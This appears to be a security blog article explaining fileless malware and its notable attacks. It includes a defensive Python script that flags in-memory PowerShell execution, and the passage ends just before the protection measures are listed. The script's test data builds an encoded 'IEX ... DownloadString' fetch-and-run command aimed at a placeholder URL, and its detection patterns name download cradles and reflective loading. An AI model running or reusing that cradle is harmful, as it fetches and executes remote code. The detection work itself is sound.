Cybercriminals keep sharpening their digital tools of trade to maintain the upper hand over their targets. Among their latest and most effective techniques is the so-called fileless malware, which is estimated to be roughly 10x more likely to succeed than traditional malware attacks.
Given how effective fileless malware is, it’s no surprise that the number of fileless attacks is growing rapidly. Between January 1st and June 30th, 2020, fileless malware was responsible for 30 percent of all detected Indicators of Compromise (IOCs), making it the most common threat category during that period.
To protect your organization against this dangerous threat, you must understand how it works and what controls can reliably keep it at bay.
What Is Fileless Malware?
Viruses, Trojan horses, and even ransomware attacks start with a malicious file. To do its job, this file needs to be delivered to the target and executed.
That’s not an easy thing to do because all responsible organizations today use some anti-malware solution to scan new files in order to verify their legitimacy. To get around anti-malware solutions, fileless malware doesn’t touch the hard drive at all, operating entirely in memory.
Typically, a fileless attack starts with a phishing email containing a link to a malicious website. When the victim visits the website, an exploit is automatically triggered, allowing the attacker to remotely load malicious code directly to memory.
The code then latches onto a trusted, already-installed administrative tool, such as Microsoft PowerShell or Windows Management Instrumentation (WMI), so it can initiate malicious processes and spread laterally across the network.
Traditional anti-malware solutions that work by comparing files against a database of known file signatures are oblivious to malicious code infiltrating system memory, leaving the victim defenseless.
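Because the malicious code never becomes a file, the signal a defender has left is the behaviour of the trusted tool it latches onto. The following is an added example (not code from the original article) that triages PowerShell command lines from process-creation telemetry for in-memory execution indicators, decoding any -EncodedCommand payload before inspecting it; the sample command lines and the placeholder URL are constructed for the example.

```python
import base64
import re

# Indicators a defender looks for in PowerShell command lines. Each is a sign that code
# is fetched, decoded or loaded and run in memory, which a file-signature scanner never sees.
IN_MEMORY_PATTERNS = {
    "download-cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\bIWR\b", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "reflective-load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "wmi-exec": re.compile(r"Win32_Process.*Create|Invoke-WmiMethod|Invoke-CimMethod", re.I),
    "stealth-flags": re.compile(r"-W(indowStyle)?\s+Hidden|-NoP(rofile)?\b", re.I),
}
# -EncodedCommand and its short forms carry a base64 blob of UTF-16LE script text.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_cmdline(cmdline):
    """Return the set of in-memory execution indicators found in a command line,
    checking the decoded -EncodedCommand payload as well as the visible text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {name for name, pat in IN_MEMORY_PATTERNS.items() if pat.search(text)}
    if decoded is not None:
        hits.add("encoded-command")
    return hits

# Constructed sample command lines, not real telemetry. The suspicious one is assembled
# here with a placeholder URL so that the example stays self-contained and offline.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(CRADLE.encode("utf-16le")).decode(),
    "powershell.exe -File C:\\Scripts\\backup.ps1",
    "powershell.exe -Command Get-Service | Where-Object Status -eq Running",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        hits = analyze_cmdline(cmd)
        print("ALERT" if hits else "ok   ", sorted(hits), cmd[:60])
```

The two benign lines produce no indicators, while the encoded one is flagged on both its launch flags and the decoded download-and-execute payload, none of which involves a file a signature scanner could match.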
What Kind of Damage Can Fileless Malware Cause?
To understand the damage fileless malware can cause, we can look at some of the more famous fileless attacks that have happened in recent years.
The Equifax data breach, the largest data breach of 2017, exposed the personal information of 147 million people and is a prime example of a fileless attack being used to steal sensitive information.
Then there’s UIWIX, a fileless ransomware that spreads via the EternalBlue exploit, which was developed by the U.S. National Security Agency (NSA) and later leaked by the Shadow Brokers hacker group. The same exploit is also used by a cryptocurrency miner (TROJ64_COINMINER.QO) to spread without leaving behind any data on the hard drive.
We should also mention KOVTER, which evolved from a police ransomware into a fileless malware threat capable of downloading the Mimikatz tool to steal login credentials from unsuspecting victims.
As you can see, fileless malware can be used to perform all kinds of nefarious activity, so gaining the means to prevent cybercriminals from doing so should be every organization’s top priority.
How to Protect Against Fileless Malware?
A multi-pronged approach is necessary to effectively protect against fileless malware, and it should include the following components: